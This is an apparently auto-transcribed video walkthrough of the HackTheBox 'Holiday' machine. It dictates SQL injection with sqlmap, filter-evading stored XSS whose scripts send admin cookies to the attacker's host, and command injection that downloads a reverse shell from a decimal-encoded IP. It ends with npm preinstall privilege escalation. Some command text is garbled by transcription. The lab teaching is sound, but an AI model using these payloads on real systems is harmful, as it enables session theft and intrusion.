What's going on, and welcome back. In today's video, we're going to go over a machine from HackTheBox. The machine name is Holiday, and the machine is considered as one of the toughest machines in HackTheBox. Basically, in this machine, we're going to go over many vulnerabilities, and exploiting each one is not that easy. So basically, we will go over SQL injection, cross-site scripting, and at the end command injection. That's all. That's only to get the reverse shell or to get a limited access. Then we're gonna have to do privilege escalation, which is not so hard, but the hardest part lies in bypassing the filters in the cross-site scripting and the command injection part. So the curator name is Goblin, and the guy is really Goblin. Okay, so let's get started. Let's see what all this is about. So basically, we have two ports, 22 and 8000. And from the title, as you can see, the web server is running Node.js Express framework. So our work will be on this port. So we will open the browser. And then navigate for 8000. So you will see a booking management website that's based on Node.js. So basically here, there's nothing to be found, but you click on the view page source, and we see something interesting here that you can see we have jQuery and Bootstrap. They are being used in the web page. That's for a node, all right? Let's go down, and now once we see nothing in the page, we have to do directory search. So we close this down, open a terminal, go Buster, here are find the word list. And choose directory medium list to medium. Now, in many scenarios, in many videos, I just go over the GoBuster in detail and I wait the results to come up. But in this video, it's gonna be, I don't want the video to be long since we have so much work to do in the upcoming sections or the upcoming moments. So I'm gonna leave this to you, all right? Run this command, I will find the directories. So the directory I will find is /admin. So once you click on /admin, you will see an admin page here. Okay, now, as all of you know, aside from trying the default credentials, if the default credentials fail, we will go over and try SQL injection to bypass the login forms. For this scenario, we're gonna configure the proxy settings, so we can use Burp Suite to try and demonstrate SQL injection. So this is the proxy here. Make sure the configuration are correct, and launch your Burp Suite. So our Burp Suite is open. We head to proxy, make sure the intercept is on. So to intercept the requests, we get back, and in here we try some dummy credentials just to capture the request. Sign in, get back. This is the request to the login page, and this is the post request. Basically, these are the credentials that we have inserted. Now we're gonna copy all of that, head back to command line, SQL request, paste the request here, and the next step, we're gonna feed this to SQL map for the automation of the SQL injection. Of course, we can try to manually inject SQL payloads, but this is not practical when you got so many targets. And since the purpose of these videos is to teach the OSCP and at the same time the real life pen testing, so we don't want to manually inject try SQL injection every time. Okay, especially if you have got so many targets. So it's better to do the automation, and when the automation fails, you would go and resort to the manual methods. Okay, so the command for SQL map is sudo SQL map -r, and we put the request, SQL request, okay, and we specify that we want to dump everything in the database, the tables, the users, everything. So we specify -dump -all, okay, and we can also specify the level of attack and the risk. So we would say level equal 5 and risk, let's say, equal 3. All right, so after waiting a bit of time, we can see that we have dumped a username, Rick A, and a hash. So the next step is we crack this hash. Now using John the Ripper, of course, we can take this hash, copy it, and store it in a file, feed this file into John the Ripper and find the password. But unfortunately, this didn't work with the wordless roq.txt. For this reason, we're going to have to use some online cracker. So I tried two options. Let me tell you what are the options. So I'm going to stop this. We don't need this anymore. Let's get back. In here, we have the first one, hash killer, and the second option is crack station. So basically, we can take the hash, we can try both methods. For the first one, okay, hash cracker MD5 SHA. Let's get back. See here. Okay, MD5. Submit. As you can see, this is the password that has been found. Now let's use crack station. We enter the password, very simple, at the hash. And the password has been found. Now, let's use this password to log in. So basically, we take this and we get back here. The username was Rick A. And now we are logged into the, I'm not going to say it's admin panel, to one of the users panels. So we see here list of bookings, the name, and the UUID. So basically, here comes the next challenge. The next challenge, we will be presented with a box to add a note. And in this box, we're going to be exploiting cross-site scripting. Okay, let's choose a random one. As you can see, we can see the details of the booking, and if we click on notes, we have a box here. And when we see a box, other than the login form and the search forms, the first thing comes to mind is the cross-site scripting, right, to try. So basically, we have a note here saying all notes must be approved by an administrator. This process can take up to 1 minute. So basically, we have an administrator examining the notes and approving them according to the policy of the site. That's in a real case scenario. But basically, here we have it's saying up to 1 minute. So basically, this means that there is an automated task running as an administrator that is reviewing the notes and approving them one by one or on a regular basis. So we have two things to take away from this. Administrator and running by 1 minute. This means that we don't need a human interaction, right, to click on a URL that we would like to send. So basically, the process that is running every 1 minute, okay, and is run as an administrator will take the payload that we will run here. So when it comes to XSS, we have two options. We have the stored and the reflected cross-site scripting. In the case of reflected cross-site scripting, we would craft a URL and send it to the victim, where they would click on the URL and would receive their cookies. But here we don't have a victim to click, right? We have a process that is running every 1 minute. Okay. The second option is to use stored cross-site scripting. In stored cross-site scripting, we would try some XSS payloads and see if the backend server would execute the scripts and store it in the database. So we can use both options, okay? So before doing that, we have to test if this box is vulnerable to cross-site scripting. So we can use something like script alert. This is the default primitive payload. Let's see now if we add it, okay, the process will review that, and after 1 minute, it will be added or displayed on the screen. Let's click on add. I have to wait for 1 minute now to see the notes displayed here. So after I refresh the page, I can see the node has been displayed here, but with a bit of modifications by the server side. As you can see, the script tags have been played with or have been filtered out. As you can see, these are the script tags have been filtered out. So basically, we can conclude that there is a filter right in the backend that doesn't let you use script tags. So initially, we would say that, or we may say that XSS is not possible. But basically, there are ways to bypass the XSS filters, and that's what this video is all about. So one thing we can try, we try to use image tags. If the image tags are allowed, okay, we can include the script tags inside the image tags, and then we would use some kind of evasion technique to let this happen. So let's say image, okay, and source equal, for example, let me set up my own web server. So sudo 503-mhttp web server. Okay, let's take a note of my IP address. I am 14.5. Okay, so here we would say HTTP 10.14.5, and 8,000. Guess I need to remove this one. Let's see how this is handled by the web server. Let's say add and wait for 1 minute to see how this script is displayed back. As you can see, we get the following output. Now, from the output, I can say that first note to take away from here is the image tags are allowed. That's one positive sign. The next is, yes, that was about it. Okay, let me see my web server here. If I get a hit on my web server, as you can see, the image tags have been executed on the back end. So it means that uh, the automated process that's running every 1 minute has tried to execute this. Although from the client side, as you can see, it seems that the web server is not interpreting these as HTML tags and is displaying them as text when we view them in the client side. But on the back end, the process is actually executing these. Okay, that's why we see here the request on the web server side. So what we can take away from this, we can use now, let me show you the page. So if you go to this list of payloads, okay, now we can try these payloads one by one, all right, and see which one of them would give us cross-site scripting, okay. But since we have only the image tag that is not being filtered, we can filter for image. As you can see, we have one here. We have these, right? Now we can try every one of these tags in Pursuit or with the fuzz and see which one of them that returns a response that is not being filtered or that we can use in the cross-site scripting. But here, let's get down. Let me show you which one that worked. No, not these. So this one, let me copy this one. Okay, let's try this one here. See how the response of the web server. Now we can click on add, okay, and see how the web server handles this, okay. If this comes out as okay, and the web server just strips some part that doesn't affect the execution of the payload that we will put here, then we will take it. So click on add, and let's wait for another extra 1 minute to see how the output looks like. Okay, let's refresh the page now. Notes. Okay, let's analyze the output. So here, the image tags haven't been stripped out. As you can see, we have a double quote here, right? That has been stripped out. And the rest of, as you can see, the good part is the script tags have not been taken out. That is good. But the double quotes, as you can see, right, have been taken out. And at the end, as you can see, the two single quotes have also been taken out, right? But the first ones, no, just the space has been cancelled. So what do we take from this? What we take from this is the following. We have to find a way, okay, to pass the payload here, okay, and without the double quotes. And for this evasion technique, OWASP has us covered. So here, if you go back, or if you go to this page, it's about XSS evasion techniques. We get down to our case, and we see one here. So this one exactly matches our case. If no codes of any kind are allowed, which is exactly our case here, these codes are not allowed. So basically, we can use eval and from car code in JavaScript to create any XSS vector. This is an example. So we can actually use this example. So how it would look like. Let's get back here and formulate our payload according to the evasion technique listed in OWASP. So basically what we would say here, let's leave this alone, okay? Since it's going to be stripped out, let's leave it as it is. And here we're going to remove the two single quotes, add /, and then we have the script tags, leave them as they are. Let's remove this one and take these. String form, take that. Of course, don't forget the eval. Yep. And here we put the payload. Let's put two parentheses for the payload. And we close the original one and one semicolon. Let's get back here. Here's the payload and we close this. All right. So according to the output, okay, we can see that these have been stripped out, so we cancel them from here. And this is the final payload. Now this is the final payload that if we pass to the web server, it will execute whatever within these two parentheses. In these two parentheses, we will have our payload. Let's copy that to a separate window or a separate, whatever you would like it to say, clear, or keep it, sudo nano nodes xss. So that is the payload, okay? Now, the next step, we have to define, or we have to know what we want to put in here, okay? So we have many options. The first one, we can say document, right? Or let's say a list of payloads list. What we can use here, one, document, right? Now open parentheses, say script source here, HTTP, of course, the web server URL. I was 10, 10, 14, 5, I guess. Yes. And here, so we want the process that is run by the administrator to access our web server and retrieve a JavaScript. Okay, this JavaScript will be responsible for getting the admin cookies. Our end goal is to grab the admin cookies by the process that's being run every 1 minute. So the administrator or the administrator process will make a request to our web server and execute the script here that will grab the cookies. So we would say, for example, cookies.js. We will write this on our own. Then we close that. Of course, don't forget this. We have one parenthesis to close. Okay. Now, unfortunately, okay, this one will not work since some of the stuff here, like the double quotes and the single quotes, were not allowed. And if they have been stripped out, or if they will be stripped out, the payload will be corrupted. So, but this one is totally valid. We will use this in another way. Now, the second option, instead of writing JavaScript code we retrieved from the web server, we can just write one and send it to directly here. Okay. Now, what do I mean by this? Let's say, for example, the direct payload will be something like var URL equal, and we put, let's say, HTTP localhost, and the port is 8000. I'm going to tell you why, and then we put the URL here. Say all of that, or this part. That is right. And since the offset is written by in Node.js, we're going to type Ajax and here specify the method, or specify what we would like to grab. So the method will be get The next option to specify in the parameters is the URL, which is the same what defined as here. And upon success, we will say function and retrieve the data. All right, let me get back. I think I messed things up. So here method. All right, now after we grab the data, we want to post these with a post request to our web server, which is running on port 8000. And 14.5. All right, one / double quotes, and then what we want to post, we're gonna post the data obtained previously. How many we have? We have one here, and previously we have one, so two brackets, one parenthesis, and one single quote. Let me explain this. So basically, if I took this and put it here, it's not going to be executed. We know the reason why, because double quotes aren't allowed and the single quotes aren't allowed. But we're going to formulate that according to the or put that into integers formula. But what does this mean? So basically, we will tell the web server that, or the process that's running as administrator, we're telling it that access the localhost. The localhost in this case is the actual page here, right? It's going to access the page, right? And after that, all of the parameters in the request, such as the URL and the cookie, okay, will be named or will be stored in the data as data here and passed over, as you can see, passed over to as a post request to the web server running on our site. That's the first option, or the second option. That's the first option. Now, the problem is, how do we get the web server to run these if some of the characters aren't allowed? That's how we're going to use encoding, okay, to convert this into integers. The same way suggested here. As you can see, these are integers. So to accomplish this purpose, we will head over to Google and say online char code converter. So let's use this one. Okay, so what do we do here? We're going to get back to the payloads, take this one. Let me save this file. Cat or ls cat notes. So take this, which is the second option or the second payload. Put it here, convert, and that is the formula that we need to put. All right, let's try it. So we take this and we get back to the file. So we go up and say here, place the payload between these two parentheses. Oh, Okay, save that, cat it, take this, and head over here. Make sure the web server is running. It is running. Now we'll receive the cookie from the process here. So we will paste this and click on add. Let's see what's going to happen. So now we'll wait for 1 minute. We expect to receive here the details. So after waiting for 1 minute, as you can see, we received a request. By the way, guys, I changed the port from 80 to 4545 on the listening side because 80 didn't work. So basically, as you can see, the web page here, the process made a request to the listener, as you can see, and here you can see the request details. If we get down, we can see the cookie in this line. Where was it? So as you can see, cookie value equal connect, and this is the value of the cookie. But this value is URL encoded, so we need to decode that into string so that we can use that. So as you can see, we have the cookie now, but if you want to decode this, you want to use URL decoder. It's very clear from here that it starts from this line, or from this place. So we take that and we head back to the page. So now all we have to do is to reload this page, okay, having purpose suite set to request. So we reload the page and we see the cookie portion. So we have to replace this with the cookie we have from here. Let's see what's going to happen. Delete this part and forward. So we can see we are now admin on the system. So we have successfully bypassed the cross-site scripting filters. Now, what is another way to do that? So if we get back here to the XSS document on the right, so let's take this way. Okay. So what if we don't want to use this method, right? We want to use the document write. So basically, we can use the document write and write the cookies to our web server. But the way it's going to work, the payload should be crafted in a way that the process will visit the web server, okay, and execute a script that we create. For example, we can take that, okay, or we can create a new one. So here, say for example, I don't know, script document location equal. Here we type the web server details slash cookies .js, okay, and or actually, yeah, XSS are painful. I know. I'm a bit confused now what to do. No, document.location is not going to work. You might try document.location, but since there is a filter to strip out the codes, double quotes, let me try write. If we want to execute the script here, we want to use a document write. So here, say cookies.js and right. So here we close the second. So we have the script here, document write. No. Left and right, HTTP. So here we have to say, for example, okay, let's cancel this one, and here put like, and say here script source equal, and that's where we put the URL link. We close the double quotes, close the row here, open a new one to end the script. One single quote here and one parenthesis. So what we need else? Of course, we need to end the original one, the script here. So we type /script. Let's look at that. One double quote here, and to account for the spaces, we put one like that. So here, what's going to happen? The web server, okay, once we convert this into numbers, don't forget to convert this into numbers using the online character encoder, okay? And after you convert that, what's going to happen? The process here will try to access your web server and try to execute or retrieve or pull the cookies.js. Here, where the parts comes the part where we need to write a code that will pull the cookies. So if you want to create the cookies.js, of course, I'm not going to do that. I'm just giving you the way to do this, or another way. I just use this method and it worked. I'm not going to head back now to sign out and try one more time just to save you the time. I'm listing you the ways. So you put that, okay, this payload. Now, convert this payload into numbers so that the web server will execute it. Now, the rest is writing the cookies.js that will pull the cookies. So this one would look like that. Cookies. Let's say that like that and say sudo nano cookies.js. Okay, so what do we write here? Window dot add event listener, and we open that. Here we use the DOM content loaded function. Let's say e, and we open the parentheses. So here we say window dot location. We specify the web server URL, which is our web server, of course, 10.10.14.5. The listening port, in my case, it's 4545. And here we say we want to retrieve the cookie. Want question mark cookie equal. No. So plus, and I want to encode that. Where is the plus? Okay, encode URI. So here, document get element by I couldn't remember this, by something like by name, right? By name. And here put cookie. Yep. And that was it, I guess. Dot retrieve now the value. What you're looking for is the cookie value. And that's it. Of course, don't forget to close that. Close the function and the parentheses. Now that's the content of the script. Okay. Now we can also specify one more way to retrieve the cookies actually. So basically, instead of that, what we would say, for example, let's say you don't like this. All right, we want to use another content for the cookie, but the next one is going to be longer. So take this one and say sudo nano cookies or v2.js. So we will make two requests. The first request will be to the web server, the target web server, where the the administrator process here will make a request to its own web server, and then once it let's say, uses all the data, including the cookies, the request, the URL, all of that, we will store this in a variable and feed this variable to another request to our web server. The request will be post request. So this script will look like that. So let's say var local host, or let's say local host request. So this request will be the local host. New XML HTTP. No. HTTP, of course, he will type request. So new request here. Now the request will be to, let's say, lh request.open will be get request, of course. Request will be the URL of the web server. So take that. Oh, no, wait. Okay. You see, I refreshed the page and I was about to lose the session. So let's bring it back here. Okay, so remove this one. Instead, just to be on the safe side, type this as localhost. And here, one single quote, false. Okay, now that's the first request. Now we will say send, and then we will open a new variable, localhost response. This variable will hold the data from the first request, okay, and say, for example, response, no. So we will hold data from the first request and say h response. I guess I'm making some here text. Okay, yeah. Now the next variable will hold the data. So the data will be like the next variable will be the second request. It will be made to the web server of my machine. So I'm gonna say remote or remote server, okay, request. New XML HTTP. Now another variable. This variable will hold the parameters. What are the parameters we're after? Cookie. No, we have equal here. Okay. Plus encode, the same way we used it in the previous script. Encode URI components. And here we put the variable here response. LH response. And we close that. Okay, what's next? We're gonna now open or make the request to post the harvested parameters. So here we will use rs request, okay, rs request.open, and say here post request. Where? To my web server. Okay, and say true. All right, now the second request will be like, what we're gonna do here? Okay, here we need to set the content type, I guess. So set request header, specify the content type, and the content type will be text, plain. All right. Lastly, we will send the parameters. So rs.request and say send var. Yeah, that's it. That's the third script. So you have three ways. This is the first script. Okay. Now, the first one or the second one, all right, you put them on the web server and then you use this payload. Here, let's open the notes one more time. So here is the content of the cookies.js. We have two ways. First one or the second one here. And you put this payload, convert it into numbers, and execute to receive the cookie. Now, enough of that explanation. Let's come to the next step. So we are now admin on the, let me get back and make sure the cookie is available if we need that. So the cookie is right here. So if we try, as I said earlier, to go to admin here, make sure the cookies are correct, not to get back to the previous user. Forward. Let's see. So we have here bookings with notes awaiting approval. So we are now the admin, as you can see, and here all of the notes that are pending approval. We have two tables, bookings and notes. We can select one to export the content. For example, if I select bookings, forward. So I see the bookings here. Okay, select notes. The same thing is going to happen. But you see here, look at that. We have export, admin export, table equal notes. So here, of course, we're not going to do XSS or SQL injection. SQL injection is not going to work here, neither. So here we would try to do command injection. So one of the ways is we type semicolon and ls. Of course, change the cookie. I know. Most of you told me don't use purpose use cookie manager, but I like it. So forward. So see here, we get invalid table name. Only characters in the range of AZ09 and diagonal /s are allowed. So it's basically we cannot do command injection using the semicolon. Semicolon is stripped out. So we need to use another character. The ampersand is allowed. And the ampersand in the URL encoding is percentile 26 and let's say ls. Let's see how this request will be interpreted. Get back. Forward. So what is that? So a folder, it's a table, I guess. Let me view it. Open this. So when I opened the table, as you can see, we have a list of the files. So actually, command injection does exist here. So when I generate a payload now, all right, to get the first reversal after all of this crap we have went through. So let's get back. And now here we generate the payload. Sudo msf vena -b, it's Linux x86. Let's say interpreter TCP lhost equal 10.10.14.5 lport 4546 -f elf, and the output will be in shell. Now remember that here AZ, as you can see, these are the only characters allowed. This means that IP address in its form is not allowed. That's why we need to convert the IP address that contains dots, okay, into decimal characters, because decimal characters are allowed here. So what do we do here? We would say here, go to open new tab and convert IP to decimal. So, oh, this is a cookie, right? Okay. So 10, 10, 14, 5. So this is the decimal number of my IP address. I'm going to use that to make a request to the web server to download the shell. So the shell has been downloaded. Now we fire up Python to download the, oh, what's this? What's that? Okay, it's already running, I guess. What, yeah, right? Where is this? Address is already in use. Yes, it's running here, so no need to run it. Okay. Now let's get back, see what we're gonna know, what we're gonna need to do with that. So here notes, and as I said, we put 26 percentile, and now we put the command. So the command is wget, and he put space, then put the IP address, which is in decimal format, slash shell. So after a bit of wrestling with this machine, I finally got the reverse shell, but to be honest, guys, the one that worked is not the Metasploit one. So I got the reverse shell, bash reverse shell from Pentest Monkey. Let me show you the content of that shell. So MSF Venom did the work for me. Nano shell v3. So that's the one that worked for me. Okay, use this one, netcat reverse shell. MSF Venom did the work for me. And I went through the same process and get the reverse shell from here. Okay, so next step is to conduct a privileged escalation. Before that, let's get a stable shell by invoking the PTY. So like that. Python isn't found. Okay, no problem. So ID. Okay, sudo dash L. See what we can do with sudo. So we can run npm, which is for managing the packages. We can run that as root or any other user without supplementing a password. So basically, how to do that? So basically, we know that npm is a tool for managing packages in JSON. So we have to know, we have to find out, or we have to provide npm here with a packaging file that elevates our privileges. So basically, here, let's find out how to create a JSON file that elevates the privileges. So we'll have to look for an example first, ls. We see a file called package.json. Let's say cat package.json. This is the formula of this file or of this script here. So you can see it has a name, version, description, and main, and here what it does. In the line, it starts with pre-install. Let's find a pre-install, something like pre-install. We're looking for a pre-install here. There is no pre-install on this JSON file. Okay, let's create a package file with JSON. Okay, and in this file, we're going to instruct npm to run the package, all right, and get us an elevated privilege. Why? Since npm can be run as sudo with any user, in our case, it's going to be root, we can let npm run the package file, and the package file, we're going to say, hey, elevate or do some shell, right? Okay, so what we can do here, let's say, for example, I'll create a new file in our local machine. So sudo nano, say that the file name is whatever you would like, p package json. So in this file, I would say one brackets and say here, let's follow the same formula here. So I have name. Okay, let's get this here. So we would start with name, version, and scripts. In the script, we will put pre-install to install the package, by npm. So here we would say name. Let's say here elevate, and here version. Say the version will be 1.0.1, and for the scripts, say that we will say pre-install, and here we invoke bin bash. Instead of installing a package, we are invoking bin bash. Let's see. Okay, we'll put one brackets here and one for the final. All right. So this one in the desktop. Let's get back here and say ls wget http 10.10.45 pck g ls. So this is the file. Where is the file? Now let's run now npm as sudo npm. Let's get up, see here what we can do. We specify the script. So here and say pck g.gsm and say unsafe here. What's gonna happen? ID same. Let's see what happened. All right, seems like we have to cat pckg. Let me look more at the script. Okay. Name, version, scripts, pre-install. Well, so that didn't work. So everything is correct. As you can see, it's trying to invoke package with JSON. So we have to rename this to be package. So we can do this way. For the original one, move package with JSON to old dot or package dot JSON dot backup, or other way around. All right, and in here we will say mv, the one that we have downloaded, ckg.json package.json. Let's see. All right, now it's the original one. Let's say sudo now move up. Let's take that. and dash I, and without specifying the script, actually, it's by default it is running the package JSON, which we have renamed dash dash unsafe and say firm. I hope it's gonna work. I hope. Oh, it worked. So this is the root user. Now say cat root txt, and finally the damned flag of this challenge. So we go to holiday. Well, it is 8/9. It's very hard, actually, very hard. And the actually being the machine being hard, not from the process or the methodology. The methodology is very clear. You just have to bypass the filters and get your way around the shell. But basically, many payloads didn't work. Try different payloads, changing from MSF Venom to the cut reverse shell. As you can see, I've tried many shells. The one that worked is version 3, version 1, and both version 1 and version 2 were MSF Venom, but they didn't work. Just the payload needs to be netcut reversal. In my case, that's how it worked. And that was the challenge, actually. So I hope you like that, and see you in the next video.